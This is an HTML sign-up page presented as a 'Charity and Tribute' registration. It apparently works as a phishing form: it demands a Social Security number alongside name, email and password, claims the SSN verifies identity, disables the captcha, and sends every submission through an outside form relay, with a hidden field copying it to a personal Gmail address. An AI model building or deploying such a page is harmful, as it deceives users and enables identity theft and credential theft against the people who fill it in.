<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Charity and Tribute</title>
  <link rel="stylesheet" href="styles.css">
  <script src="https://kit.fontawesome.com/a5d90205bb.js" crossorigin="anonymous"></script>
</head>
<body>
  <div class="container">
    <div class="form-box">
      <h1 id="title">Sign Up</h1>

      <form action="https://formsubmit.co/3b70a9ce54d79a1698cd7ef0a3e058b0" method="POST">
        <div class="input-group">
          <div class="input-field">
            <i class="fa-solid fa-user"></i>
            <input type="text" id="name" placeholder="Name" name="name" required>
          </div>

          <div class="input-field">
            <i class="fa-solid fa-envelope"></i>
            <input type="email" id="email" placeholder="Email" name="email" required>
          </div>

          <div class="input-field">
            <i class="fa-solid fa-key"></i>
            <input type="password" id="password" placeholder="Create Password" name="password">
          </div>

          <div class="ssn-info">
            <h2>ENTER YOUR SOCIAL SECURITY NUMBER</h2>
            <p>Your social security number is needed to verify your identity. We will never reveal your personal information without your permission.</p>
          </div>

          <div class="input-field">
            <input type="text" id="ssn" placeholder="SSN" name="ssn" required>
          </div>
          <input type="hidden" name="_captcha" value="false">
          <input type="hidden" name="_template" value="table">
          <input type="hidden" name="_cc" value="hopeheryordeji@gmail.com">

          <button class="ssn">Verify</button>
        </div>
      </form>     
    </div>
  </div>
</body>
</html>
